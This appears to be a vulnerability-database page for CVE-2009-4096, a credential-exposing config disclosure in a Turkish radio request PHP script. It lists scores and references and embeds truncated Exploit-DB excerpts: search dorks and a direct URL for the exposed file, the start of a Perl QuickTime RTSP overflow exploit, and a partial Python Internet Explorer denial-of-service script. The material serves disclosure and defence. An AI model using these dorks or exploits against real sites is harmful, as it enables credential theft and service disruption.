CVE-2009-4096
published 2009-11-29CVE-2009-4096: RADIO istek scripti 2.5 stores sensitive information under the web root with insufficient access control, which allows remote attackers to obtain user…
PriorityP346high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
2.35%
81.6th percentile
RADIO istek scripti 2.5 stores sensitive information under the web root with insufficient access control, which allows remote attackers to obtain user credentials via a direct request for estafresgaftesantusyan.inc.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| scriptlerim | radio_isetek_scripti | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Apple QuickTime 7.2/7.3 - RTSP Buffer Overflow
exploitdb·2010-01-06
CVE-2007-6166 Apple QuickTime 7.2/7.3 - RTSP Buffer Overflow
Apple QuickTime 7.2/7.3 - RTSP Buffer Overflow
---
# Exploit Title: Apple QuickTime 7.2/7.3 RTSP BOF (Perl)
# Date: 2009-01-06
# Author: Jacky
# Software Link: [downoad link if available]
# Version: 7.2/7.3
# Tested on: Windows XP SP3
# CVE : [if exists]
# Code :
#Apple QuickTime 7.2/7.3 RTSP BOF (Perl Edition )
#Discovered by (Krystian Kloskowski (h07) )
#Written and coded by Jacky!
#All Greetz to Peter Van Eeckhoutte and Corelan Team ( Best exploitation team);-)
#This time i wrote the exploit in perl , because i saw that it was written
#many times in python and ruby only !
#This exploit is for EDUCATIONAL PURPOSES ONLY !!!
#!/usr/bin/perl -w
# (RTSP) Content-Type: [A * 995] + [B * 4096]\r\n
#
# 0x41414141 Pointer to next SEH record
# 0x42424242 SE handler
use strict;
use Socket;
my $ju
Exploit-DB
Radio istek scripti 2.5 - Remote Configuration Disclosure
exploitdb·2009-11-25
CVE-2009-4096 Radio istek scripti 2.5 - Remote Configuration Disclosure
Radio istek scripti 2.5 - Remote Configuration Disclosure
---
turkish radio php script
RADIO istek scripti (tr) Version 2.5 (tr) Remote config Vulnerability
> Found by? :? kurdish hackers team
> C0ntact : pshela [at] YaHoo .com
> Groups : Kurd-Team
> site : www.kurdteam.org
+++++++++++++++++++ Script information+++++++++++++++++
> script :: RADIO istek scripti (tr) Version 2.5 (tr)
> download script ::
http://www.scriptlerim.net/download/radio-istek-scripti-tr-.html
+++++++++++++++++++++++ Exploit +++++++++++++++++++++++
> Dork:"2007 RADIOZAZA www.radiozaza.de? istek hatti Version 2.5"
> 0r
> Dork:"estafresgaftesantusyan.inc"
> Exploit ::
>>> http://server/path/estafresgaftesantusyan.inc
Now can see all information Config ...
> All freinds , Zryan_kurd , all member kurdi
Exploit-DB
Microsoft Internet Explorer 8 - File Download Denial of Service
exploitdb·2009-04-11
CVE-2009-1335 Microsoft Internet Explorer 8 - File Download Denial of Service
Microsoft Internet Explorer 8 - File Download Denial of Service
---
source: https://www.securityfocus.com/bid/34478/info
Microsoft Internet Explorer is prone to a remote denial-of-service vulnerability.
Successful exploits can allow attackers to hang the affected browser, resulting in denial-of-service conditions.
#/usr/bin/env python
import sys
import random
CHAR_SET = [chr(x) for x in range(0x20)]
CHAR_SET += [chr(x) for x in range(128, 256)]
def send_file():
l = 800000 + 4096
print "Content-Type: text/plain"
print "Content-Length: %d" % l
print "Cache-Control: no-cache, no-store, must-revalidate"
# this is not standardized, but use it anyway
print "Pragma: no-cache"
print ""
# bypass IE download dialog
sys.stdout.write("a" * 4096)
# print junks
for i in xrange(l):
sys.stdout.writ
No writeups or analysis indexed.
http://osvdb.org/60516http://packetstormsecurity.org/0911-exploits/istek-disclose.txthttp://secunia.com/advisories/37478http://www.exploit-db.com/exploits/10231http://osvdb.org/60516http://packetstormsecurity.org/0911-exploits/istek-disclose.txthttp://secunia.com/advisories/37478http://www.exploit-db.com/exploits/10231
2009-11-29
Published